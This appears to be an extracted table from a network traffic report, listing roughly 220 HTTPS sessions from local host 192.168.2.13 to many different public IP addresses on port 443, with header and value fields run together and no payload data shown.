                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16338192.168.2.135196473.63.184.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16339192.168.2.1341994167.2.135.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16340192.168.2.1342358219.83.78.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16341192.168.2.135623282.107.142.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16342192.168.2.1348230105.172.181.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16343192.168.2.1346240131.125.5.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16344192.168.2.1346714183.253.113.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16345192.168.2.135258623.150.39.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16346192.168.2.1336038203.188.217.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16347192.168.2.1349272156.178.187.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16348192.168.2.135642681.248.31.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16349192.168.2.1359538201.173.27.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16350192.168.2.1352548187.152.187.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16351192.168.2.134051081.106.12.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16352192.168.2.1341520161.8.125.221443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16353192.168.2.1355906166.193.15.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16354192.168.2.133460434.8.248.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16355192.168.2.1352478158.219.58.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16356192.168.2.1338456170.16.37.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16357192.168.2.1334986115.120.5.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16358192.168.2.1348026172.232.179.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16359192.168.2.133783212.146.109.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16360192.168.2.1344996160.161.147.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16361192.168.2.1351094202.205.60.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16362192.168.2.1348782220.56.143.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16363192.168.2.1335882189.229.209.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16364192.168.2.1359644212.48.226.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16365192.168.2.1353674209.74.185.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16366192.168.2.1349558179.151.106.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16367192.168.2.134164640.8.216.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16368192.168.2.1333924170.49.9.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16369192.168.2.135594698.239.172.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16370192.168.2.136007260.42.150.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16371192.168.2.1359930169.18.74.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16372192.168.2.1346714213.114.237.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16373192.168.2.134159435.228.182.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16374192.168.2.1345804175.242.117.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16375192.168.2.1355402147.105.10.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16376192.168.2.1341698120.251.195.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16377192.168.2.134937898.183.142.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16378192.168.2.134542686.182.200.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16379192.168.2.1356632123.192.56.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16380192.168.2.1343264166.147.235.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16381192.168.2.1340902133.179.100.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16382192.168.2.133681488.107.125.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16383192.168.2.134747289.196.65.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16384192.168.2.1338732173.10.143.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16385192.168.2.1337032169.138.219.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16386192.168.2.133738891.227.236.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16387192.168.2.135035634.66.157.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16388192.168.2.133819271.125.120.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16389192.168.2.1357664145.38.29.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16390192.168.2.1347854149.236.1.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16391192.168.2.134970641.38.163.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16392192.168.2.1360750114.139.10.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16393192.168.2.133354670.118.123.2443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16394192.168.2.1339242116.47.221.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16395192.168.2.133761644.153.126.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16396192.168.2.1351454197.162.82.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16397192.168.2.1338790189.33.202.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16398192.168.2.134982234.40.72.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16399192.168.2.134395683.158.173.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16400192.168.2.135636865.176.45.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16401192.168.2.1350614186.243.189.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16402192.168.2.1336578110.94.222.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16403192.168.2.1355686179.167.74.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16404192.168.2.134965214.175.163.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16405192.168.2.135918877.125.59.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16406192.168.2.133625858.216.91.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16407192.168.2.134301674.210.153.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16408192.168.2.135584851.125.114.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16409192.168.2.133467286.155.118.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16410192.168.2.133665695.48.77.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16411192.168.2.133809040.254.167.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16412192.168.2.134654074.174.203.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16413192.168.2.1335528222.220.89.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16414192.168.2.135662262.116.80.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16415192.168.2.1345688162.204.120.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16416192.168.2.1347984166.158.123.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16417192.168.2.1338124111.180.30.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16418192.168.2.134702698.200.233.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16419192.168.2.135990848.188.201.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16420192.168.2.1356536179.13.22.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16421192.168.2.13581845.168.101.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16422192.168.2.1338732203.192.224.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16423192.168.2.133767066.51.234.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16424192.168.2.1357324197.59.29.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16425192.168.2.1357782125.116.92.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16426192.168.2.1360016113.42.160.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16427192.168.2.1344226182.56.5.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16428192.168.2.135174475.242.138.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16429192.168.2.1349386131.88.202.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16430192.168.2.13609201.108.188.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16431192.168.2.1338830147.112.72.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16432192.168.2.133737692.137.242.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16433192.168.2.1340154194.95.230.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16434192.168.2.134554467.240.66.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16435192.168.2.134258223.146.95.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16436192.168.2.1347462103.215.215.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16437192.168.2.1346962159.173.169.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16438192.168.2.1352810168.210.139.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16439192.168.2.1356718172.196.110.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16440192.168.2.1346204110.172.169.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16441192.168.2.1335078172.45.161.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16442192.168.2.1353306201.235.194.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16443192.168.2.1350792194.35.176.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16444192.168.2.133572286.68.227.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16445192.168.2.1346714114.6.208.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16446192.168.2.134241076.195.55.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16447192.168.2.135050858.100.56.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16448192.168.2.135876690.185.1.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16449192.168.2.1350330133.218.239.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16450192.168.2.1344334133.111.170.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16451192.168.2.1357492121.183.66.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16452192.168.2.1337352134.201.146.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16453192.168.2.133843253.213.40.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16454192.168.2.1354898104.194.197.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16455192.168.2.134809825.160.178.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16456192.168.2.1337746153.193.29.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16457192.168.2.1332804180.11.6.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16458192.168.2.133857443.159.185.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16459192.168.2.134644897.205.250.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16460192.168.2.1333184122.48.184.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16461192.168.2.135307074.30.69.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16462192.168.2.1346712207.42.8.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16463192.168.2.1359228196.108.253.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16464192.168.2.135795077.189.179.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16465192.168.2.1339126146.212.222.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16466192.168.2.134585287.141.214.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16467192.168.2.1344998163.5.66.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16468192.168.2.1349560142.248.72.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16469192.168.2.135874045.130.122.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16470192.168.2.135368444.49.156.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16471192.168.2.1349038185.219.8.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16472192.168.2.1352630126.109.31.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16473192.168.2.134137248.49.209.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16474192.168.2.1358214163.253.26.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16475192.168.2.1356768199.39.224.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16476192.168.2.135117814.187.226.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16477192.168.2.133729412.76.24.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16478192.168.2.1348504164.105.247.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16479192.168.2.1333584188.187.204.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16480192.168.2.1347406102.99.45.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16481192.168.2.1340786220.85.81.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16482192.168.2.1360136158.101.222.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16483192.168.2.1353030199.197.133.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16484192.168.2.1358044220.56.106.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16485192.168.2.135661027.133.28.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16486192.168.2.13352949.112.146.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16487192.168.2.135678279.194.179.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16488192.168.2.1348248110.150.18.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16489192.168.2.134876692.227.72.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16490192.168.2.1358862151.69.223.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16491192.168.2.1346710138.101.81.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16492192.168.2.135151262.234.14.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16493192.168.2.135514819.23.70.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16494192.168.2.135580072.65.107.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16495192.168.2.135944459.218.23.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16496192.168.2.133534094.106.225.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16497192.168.2.1349618223.174.168.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16498192.168.2.1350662124.161.166.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16499192.168.2.135656035.33.194.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16500192.168.2.134495885.79.169.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16501192.168.2.1333462119.66.144.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16502192.168.2.1335004145.29.30.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16503192.168.2.1334396110.160.37.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16504192.168.2.1355664170.184.204.189443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16505192.168.2.1334536200.245.112.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16506192.168.2.1348284184.220.117.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16507192.168.2.134015697.91.140.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16508192.168.2.1340264118.53.50.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16509192.168.2.1339374172.252.177.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16510192.168.2.135398670.205.202.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16511192.168.2.134230086.140.1.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16512192.168.2.134304812.214.140.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16513192.168.2.134391624.183.22.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16514192.168.2.1354774155.244.78.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16515192.168.2.1359730112.63.85.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16516192.168.2.134119865.42.244.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16517192.168.2.134800249.1.192.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16518192.168.2.1338874145.229.74.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16519192.168.2.1355974221.101.219.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16520192.168.2.1340520134.63.99.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16521192.168.2.1339852140.237.201.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16522192.168.2.1341958180.247.117.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16523192.168.2.133854640.113.69.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16524192.168.2.135893017.23.178.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16525192.168.2.1333112142.70.212.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16526192.168.2.1352488108.160.129.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16527192.168.2.1347476188.6.178.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16528192.168.2.1360878152.157.46.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16529192.168.2.135608848.184.76.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16530192.168.2.134000495.5.177.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16531192.168.2.1346882161.44.2.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16532192.168.2.1337806140.117.131.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16533192.168.2.1355058218.190.72.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16534192.168.2.1334186139.248.218.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16535192.168.2.134344898.116.245.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16536192.168.2.134457247.171.95.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16537192.168.2.1344258166.112.196.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16538192.168.2.133482420.177.55.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16539192.168.2.13564004.207.255.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16540192.168.2.133347287.4.3.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16541192.168.2.1339800121.216.119.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16542192.168.2.134909687.24.4.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16543192.168.2.135694076.241.70.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16544192.168.2.136058493.42.26.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16545192.168.2.1335026137.184.219.156443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16546192.168.2.1338806186.40.57.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16547192.168.2.1340286159.127.253.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16548192.168.2.1346386188.156.68.22443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16549192.168.2.133623070.248.157.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16550192.168.2.1352784130.214.164.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16551192.168.2.133846897.146.89.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16552192.168.2.1335120152.168.86.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16553192.168.2.134137269.110.175.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16554192.168.2.1355340197.200.210.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16555192.168.2.134060241.180.158.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16556192.168.2.1349272152.162.121.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16557192.168.2.135614485.227.37.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16558192.168.2.133572483.71.138.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    16559192.168.2.133717876.23.79.106443
